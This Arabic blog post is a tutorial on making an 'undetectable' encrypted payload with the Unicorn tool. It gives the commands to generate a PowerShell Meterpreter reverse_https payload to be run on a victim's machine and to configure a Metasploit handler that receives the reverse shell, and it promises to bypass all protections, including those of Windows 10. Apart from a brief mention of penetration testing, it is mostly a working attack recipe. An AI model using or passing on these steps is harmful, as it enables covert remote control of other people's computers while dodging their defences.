عمل بايلود غير قابل للكشف - Unicorn

مواضيع مفضلة

الثلاثاء، 5 فبراير 2019

عمل بايلود غير قابل للكشف - Unicorn

 

عمل بايلود مشفر غير قابل للكشف

 

ماهي أداة Unicorn ؟


تم إنشاؤها بواسطة TrustedSec , هي أداة بسيطة مصممة للمساعدة في اختبار الاختراق وعمل هجمات powershell  وحقن البايلود shellcode الذي ينشىئ أتصال بينك وبين الضحية يعرف بكود برمجي يستخدم كبايلود مباشرة في الذاكرة 




Unicorn






سنتعرف علي كيفية انشاء بايلود مشفر باستخدام أداة Unicorn وتخطي جميع الحمايات وأيضا تخطي حمايات وندوز 10 باخر اصداراته 




الخطوة الأولى  :- 

تحميل أداة unicorn بأستخدام امر

git clone https://github.com/trustedsec/unicorn

بعد تحميل الاداة اذهب الى المسار
cd unicorn
او المكان الذي تم تحميل الأداه فيه 

لأظهار الخيارات والاوصاف لكل هجوم استخدم الامر التالي

unicorn.py --help/.



الخطوة الثانية  :-

لتكوين البايلود أستخدم الامر التالي :

 

unicorn.py windows/meterpreter/reverse_https "your ip" "port/.


ستستخدم الااداة unicorn ميتاسبليوت موديل reverse_https للهجوم


 الااداة unicorn


عند توليد البايلود سوف يظهر ملفين الاول powershell_attack.txt والذي سوف يتم تنفيذه بجهاز الضحية والملف الثاني unicorn.rc وهو يحتوي على الاعدادات التي سوف يتم ادخالها في الميتاسبلويت


الخطوة الثالثة  :-

تشغيل ميتاسبلويت بكتابة الامر msfconsole 
بعد تشغيل الاداة ادخل الاوامر التالية

use multi/handler
set payload windows/meterpreter/reverse_https
set LHOST your ip
set LPORT 4444
set ExitOnSession false
set EnableStageEncoding true
exploit

 
غير قابل للكشف payload عمل
غير قابل للكشف payload عمل

إرسال تعليق

المشاركة على واتساب متوفرة فقط في الهواتف